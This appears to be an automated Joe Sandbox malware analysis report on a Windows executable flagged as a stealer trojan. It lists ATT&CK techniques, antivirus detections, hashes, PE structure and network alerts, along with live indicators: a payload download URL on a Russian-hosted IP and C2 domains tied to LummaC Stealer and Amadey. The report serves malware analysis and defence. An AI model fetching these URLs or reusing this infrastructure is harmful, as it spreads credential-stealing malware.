    Execution: Windows Management Instrumentation (12); Command and Scripting Interpreter (2); At; Cron; Launchd
    Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
    Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script
    Defense Evasion: Virtualization/Sandbox Evasion (44); Process Injection (1); Obfuscated Files or Information (2); Software Packing (12); DLL Side-Loading (1)
    Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets
    Discovery: Security Software Discovery (851); Virtualization/Sandbox Evasion (44); Process Discovery (2); File and Directory Discovery (1); System Information Discovery (223)
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
    Collection: Archive Collected Data (1); Data from Local System (31); Data from Network Shared Drive; Input Capture; Keylogging
    Command and Control: Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (13); Protocol Impersonation; Fallback Channels
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
    Behavior Graph (ID: 1647734; Sample: Qyk8RJnGN7.exe; Startdate: 25/03/2025; Architecture: WINDOWS; Score: 100)

    Top-level signatures: Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 3 other signatures.
    Process Qyk8RJnGN7.exe started and contacted: 176.113.115.7, 80 (SELECTELRU, Russian Federation); wxayfarer.live 104.21.112.1, 443, 49681, 49682 (CLOUDFLARENETUS, United States).
    Process signatures: Detected unpacking (changes PE section rights); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Query firmware table information (likely to detect VMs); 9 other signatures.



    Source | Detection | Scanner | Label
    Qyk8RJnGN7.exe | 70% | Virustotal |
    Qyk8RJnGN7.exe | 69% | ReversingLabs | Win32.Trojan.Cerbu
    Qyk8RJnGN7.exe | 100% | Avira | TR/Crypt.TPM.Gen
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label
    http://176.113.115.7/mine/random.exe:9x | 0% | Avira URL Cloud | safe
    https://wxayfarer.live/ALosnzG | 100% | Avira URL Cloud | malware
    http://176.113.115.7:80/mine/random.exerosoft | 0% | Avira URL Cloud | safe
    https://wxayfarer.live/ALosnzB | 100% | Avira URL Cloud | malware
    http://176.113.115.7/7 | 0% | Avira URL Cloud | safe
    http://176.113.115.7/mine/random.exeJ | 0% | Avira URL Cloud | safe
    https://wxayfarer.live/F | 100% | Avira URL Cloud | malware
    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252. | 0% | Avira URL Cloud | safe
    https://wxayfarer.live/ALosnztAw | 100% | Avira URL Cloud | malware
    https://wxayfarer.live:443/ALosnz | 100% | Avira URL Cloud | malware
    http://176.113.115.7/edX | 0% | Avira URL Cloud | safe
    https://wxayfarer.live/ALosnz% | 100% | Avira URL Cloud | malware
    https://wxayfarer.live:443/ALosnzal | 100% | Avira URL Cloud | malware


Name | IP | Active | Malicious | Antivirus Detection | Reputation
wxayfarer.live | 104.21.112.1 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://wxayfarer.live/ALosnz | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0 | Qyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252. | Qyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://176.113.115.7:80/mine/random.exerosoft | Qyk8RJnGN7.exe, 00000000.00000002.1229503900.0000000001483000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org?q= | Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://176.113.115.7/mine/random.exe | Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014F2000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000002.1229655461.0000000001509000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://wxayfarer.live/ALosnzG | Qyk8RJnGN7.exe, 00000000.00000003.999657128.0000000001509000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://wxayfarer.live/ | Qyk8RJnGN7.exe, Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014F2000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.980354207.00000000014F2000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.924127439.0000000001483000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000003.980607301.00000000014F4000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://wxayfarer.live/ALosnzB | Qyk8RJnGN7.exe, 00000000.00000003.999657128.0000000001509000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | Qyk8RJnGN7.exe, 00000000.00000003.952693809.00000000060C3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://176.113.115.7/mine/random.exe:9x | Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014F2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://wxayfarer.live/ALosnztAw | Qyk8RJnGN7.exe, 00000000.00000003.980607301.0000000001509000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico | Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://wxayfarer.live/F | Qyk8RJnGN7.exe, 00000000.00000003.962059232.00000000014F3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://176.113.115.7/7 | Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014F2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/v20 | Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | Qyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://176.113.115.7/mine/random.exeJ | Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014A7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://x1.c.lencr.org/0 | Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtabv20 | Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://wxayfarer.live:443/ALosnz | Qyk8RJnGN7.exe, Qyk8RJnGN7.exe, 00000000.00000003.924127439.0000000001483000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0? | Qyk8RJnGN7.exe, 00000000.00000003.951659804.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u | Qyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e | Qyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg | Qyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://176.113.115.7/edX | Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014F2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://wxayfarer.live/ALosnz% | Qyk8RJnGN7.exe, 00000000.00000003.999657128.0000000001509000.00000004.00000020.00020000.00000000.sdmp, Qyk8RJnGN7.exe, 00000000.00000002.1229655461.0000000001509000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.mozilla.org/products/firefoxgro.all | Qyk8RJnGN7.exe, 00000000.00000003.952693809.00000000060C3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://wxayfarer.live:443/ALosnzal | Qyk8RJnGN7.exe, 00000000.00000003.980354207.0000000001483000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://gemini.google.com/app?q= | Qyk8RJnGN7.exe, 00000000.00000003.929673812.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://176.113.115.7/ | Qyk8RJnGN7.exe, 00000000.00000002.1229655461.00000000014F2000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta | Qyk8RJnGN7.exe, 00000000.00000003.960759964.0000000005E54000.00000004.00000800.00020000.00000000.sdmp | false | | high
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.112.1 | wxayfarer.live | United States | 13335 | CLOUDFLARENETUS | false
176.113.115.7 | unknown | Russian Federation | 49505 | SELECTELRU | false
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1647734
Start date and time:2025-03-25 08:15:42 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 46s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:11
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:Qyk8RJnGN7.exe
renamed because original name is a hash value
Original Sample Name:880af66f46621859f8330e966419e8cf.exe
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@1/0@1/2
EGA Information:Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 4.175.87.197, 184.31.69.3
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Qyk8RJnGN7.exe, PID 6940 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:16:40 | API Interceptor | 14x Sleep call for process: Qyk8RJnGN7.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.112.1 | P.O.exe | malicious | FormBook | www.auto-total.info/bt6e/
104.21.112.1 | BVEWWBCB.msi | malicious | Unknown | speed-cloud-soft.rest/c
104.21.112.1 | #$43557.exe | malicious | FormBook | www.nolae-eu.shop/11jg/
104.21.112.1 | BID_TERMS.EXE.exe | malicious | FormBook | www.meshki-co-uk.shop/mzlg/
104.21.112.1 | SfF8tFQ11f.exe | malicious | Unknown | cpvnxker.xyz/headimage.jpg
104.21.112.1 | Urgent Purchase Order.vbe | malicious | FormBook | www.rbopisalive.cyou/6m32/
104.21.112.1 | CQDNwLUdY4.exe | malicious | FormBook | www.rbopisalive.cyou/2dxw/
104.21.112.1 | sY8Sfsplzf.exe | malicious | FormBook | www.enoughmoney.online/z9gb/?TF-P7=zR3cIyonFbUCfX4wpKNWKHtg5/zg1+YcnXRNJ+yYPjA6661hsBw23FkDfEgtp7rlWUxdaFu+U4x0i75BG7d41DR1Eot6cYC6DrNKmQYa+SmymwWTrA==&Pv5=thT0rvC
104.21.112.1 | gbdXRnNKkm.exe | malicious | FormBook | www.rbopisalive.cyou/a669/
104.21.112.1 | JOB NO. AIQ8478.bat.exe | malicious | Lokibot | touxzw.ir/sccc/five/fre.php
176.113.115.7 | random.exe | malicious | Amadey, LummaC Stealer | 176.113.115.7/mine/random.exe
176.113.115.7 | 6xdW3oRY63.exe | malicious | Amadey, DarkVision Rat, LummaC Stealer, Vidar | 176.113.115.7/mine/random.exe
176.113.115.7 | work.js | malicious | Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar | 176.113.115.7/files/unique2/random.exe
176.113.115.7 | random.exe | malicious | Amadey, LummaC Stealer, Stealc, Xmrig | 176.113.115.7/files/crazytimeya/random.exe
176.113.115.7 | random.exe | malicious | Amadey | 176.113.115.7/files/qqdoup/random.exe
176.113.115.7 | VSAXXKuhCu.exe | malicious | Amadey, AsyncRAT | 176.113.115.7/files/unique2/random.exe
176.113.115.7 | L0erlgyZ6f.exe | malicious | Amadey, LummaC Stealer | 176.113.115.7/files/qqdoup/random.exe
176.113.115.7 | 13s1HMkHKv.exe | malicious | Amadey, DarkVision Rat, Fallen Miner, LummaC Stealer | 176.113.115.7/files/2043702969/dx3hXS1.exe
176.113.115.7 | wJWNpO6lcm.exe | malicious | Amadey, GCleaner, LummaC Stealer | 176.113.115.7/files/unique2/random.exe
176.113.115.7 | download.php.exe.bin.exe | malicious | Amadey, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | 176.113.115.7/mine/random.exe

Match | Associated Sample Name / URL | Detection | Threat Name | Context
wxayfarer.live | 9GNLDc2CHH.exe | malicious | LummaC Stealer | 104.21.80.1
wxayfarer.live | jx22fssg2d.exe | malicious | LummaC Stealer | 104.21.16.1
wxayfarer.live | EUsF26UAMM.exe | malicious | LummaC Stealer | 104.21.16.1
wxayfarer.live | ZqkKpwG.exe | malicious | Unknown | 104.21.16.1
wxayfarer.live | random(3).exe | malicious | LummaC Stealer | 104.21.96.1
wxayfarer.live | random(9).exe | malicious | Amadey, CryptOne, LummaC Stealer, Socks5Systemz | 104.21.64.1
wxayfarer.live | ZqkKpwG.exe | malicious | Unknown | 104.21.16.1
wxayfarer.live | random.exe1.exe | malicious | LummaC Stealer | 104.21.32.1
wxayfarer.live | random.exe | malicious | Amadey, LummaC Stealer | 104.21.112.1
wxayfarer.live | Kr9UTz2.exe | malicious | LummaC Stealer | 104.21.48.1

Match | Associated Sample Name / URL | Detection | Threat Name | Context
SELECTELRU | nrKr2roAsG.exe | malicious | Amadey | 176.113.115.6
SELECTELRU | 9GNLDc2CHH.exe | malicious | LummaC Stealer | 176.113.115.7
SELECTELRU | jx22fssg2d.exe | malicious | LummaC Stealer | 176.113.115.7
SELECTELRU | EUsF26UAMM.exe | malicious | LummaC Stealer | 176.113.115.7
SELECTELRU | JtH26qoxr2.exe | malicious | Amadey | 176.113.115.6
SELECTELRU | 0Q6EWqWu4N.exe | malicious | Amadey | 176.113.115.6
SELECTELRU | C75q85Awi4.exe | malicious | Amadey | 176.113.115.6
SELECTELRU | 5yCKVE324w.exe | malicious | Amadey | 176.113.115.6
SELECTELRU | 6nsLmbufDq.exe | malicious | Amadey | 176.113.115.6
SELECTELRU | jZcih8RI7e.exe | malicious | Amadey | 176.113.115.6
CLOUDFLARENETUS | New Purchase Order.exe | malicious | Snake Keylogger | 104.21.96.1
CLOUDFLARENETUS | h2H2R15NDO.exe | malicious | LummaC Stealer | 104.21.72.121
CLOUDFLARENETUS | project.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.16.1
CLOUDFLARENETUS | m3gyyctL5A.exe | malicious | LummaC Stealer | 172.67.183.183
CLOUDFLARENETUS | bettercontactforgreatworksgoodforbetter.hta | malicious | Cobalt Strike, FormBook | 104.21.32.1
CLOUDFLARENETUS | Globalmaging documents 1202692293.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.16.1
CLOUDFLARENETUS | DHL - OVERDUE - REMINDER - 1302115347.exe | malicious | FormBook | 104.21.9.169
CLOUDFLARENETUS | awb_fedex_documents_delivery_25_03_2025_0000000000000_doc.bat | malicious | GuLoader | 172.67.213.163
CLOUDFLARENETUS | 20250325252508951.vbs | malicious | MSIL Logger, MassLogger RAT | 104.21.72.118
CLOUDFLARENETUS | HSBC Payment Advice.pdf.exe | malicious | CryptOne, Snake Keylogger, VIP Keylogger | 104.21.80.1

Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | h2H2R15NDO.exe | malicious | LummaC Stealer | 104.21.112.1
a0e9f5d64349fb13191bc781f81f42e1 | m3gyyctL5A.exe | malicious | LummaC Stealer | 104.21.112.1
a0e9f5d64349fb13191bc781f81f42e1 | PO#45028.xlam.xlsx | malicious | Unknown | 104.21.112.1
a0e9f5d64349fb13191bc781f81f42e1 | Nuevo comando_BR WJO-3-24-2025.xlam.xlsx | malicious | Unknown | 104.21.112.1
a0e9f5d64349fb13191bc781f81f42e1 | PURCHASE ORDER 5172025.xla.xlsx | malicious | Unknown | 104.21.112.1
a0e9f5d64349fb13191bc781f81f42e1 | BL 248436935 CNTR MRKU9180226.docx.doc | malicious | Unknown | 104.21.112.1
a0e9f5d64349fb13191bc781f81f42e1 | PURCHASE ORDER 5172025.xla.xlsx | malicious | Unknown | 104.21.112.1
a0e9f5d64349fb13191bc781f81f42e1 | ysxekL7sOS.exe | malicious | LummaC | 104.21.112.1
a0e9f5d64349fb13191bc781f81f42e1 | SecuriteInfo.com.Other.Malware-gen.24773.2907.xlsx | malicious | Unknown | 104.21.112.1
a0e9f5d64349fb13191bc781f81f42e1 | SecuriteInfo.com.Other.Malware-gen.24773.2907.xlsx | malicious | Unknown | 104.21.112.1
No context
No created / dropped files found
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.57427552688049
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:Qyk8RJnGN7.exe
File size:2'930'176 bytes
MD5:880af66f46621859f8330e966419e8cf
SHA1:ce5975e4ecf122b6463f0468e27511fa0ec3f497
SHA256:fe9333e5bbe2789f4ac7c4f7d084baf1e4d38d53c3f11ca56116cc6f6dfc9382
SHA512:c81f48d408159aa69f52935adddec4c9c563f702bab5f7ea8a50f9157f7c821aaaca48a4f62801a2a7cf438ffc1da478c1226d95cbf15d54cbc09b849867b757
SSDEEP:49152:juk/CnqdzOriSq1G9u2mRNdy+x6LdNiO8H+2QvYyj6A3VA1QyJz:6k/CqZOriS+GxmRNdyU0H8H+29ymA+v
TLSH:BED55A62B829B2CFE4CA23795527CD826E5D07B9471448C3983D68BE7DB7CC035B6D28
File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....T.g............................../...........@...........................0......X-...@.................................W...k..
Icon Hash:90cececece8e8eb0
Entrypoint:0x6fe000
Entrypoint Section:.taggant
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:0x67E154E2 [Mon Mar 24 12:49:38 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                            Instruction
                                                            jmp 00007F0BACEE9F4Ah
                                                            sete byte ptr [eax+eax]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            jmp 00007F0BACEEBF45h
                                                            add byte ptr [edx+ecx], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            xor byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            sbb al, 00h
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add al, 0Ah
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            pop es
                                                            add byte ptr [eax], 00000000h
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            adc byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add ecx, dword ptr [edx]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x61057 | 0x6b | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x60000 | 0x300 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x611f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed, special chars) | 0x1000 | 0x5f000 | 0x2d800 | 8a098440eed81a6874ddb47839d13a5a | False | 0.998052240728022 | data | 7.982701324787569 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x60000 | 0x300 | 0x200 | ff6a9ea54eaa641989417e325282354d | False | 0.87109375 | data | 6.554420371420352 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x61000 | 0x1000 | 0x200 | f47b289bcee0e13a937cc29db13607bf | False | 0.150390625 | data | 1.0437720338377494 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
tjdrfttm | 0x62000 | 0x29b000 | 0x29a200 | 10e9d048355406b117613e6e22210607 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
msexgfdi | 0x2fd000 | 0x1000 | 0x600 | 6910ed3650d00c45e48afb1128b1e2ac | False | 0.6048177083333334 | data | 5.158292030060077 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x2fe000 | 0x3000 | 0x2200 | dd16c5dc6dc6472db6a09d11e14be62d | False | 0.06295955882352941 | DOS executable (COM) | 0.7845590861998107 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x2fbec8 | 0x2a5 | XML 1.0 document, ASCII text | | | 0.4963072378138848

DLL | Import
kernel32.dll | lstrcpy


Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-25T08:16:41.089875+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49681 | 104.21.112.1 | 443 | TCP
2025-03-25T08:16:42.812374+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49682 | 104.21.112.1 | 443 | TCP
2025-03-25T08:16:43.964393+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49683 | 104.21.112.1 | 443 | TCP
2025-03-25T08:16:45.016095+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49684 | 104.21.112.1 | 443 | TCP
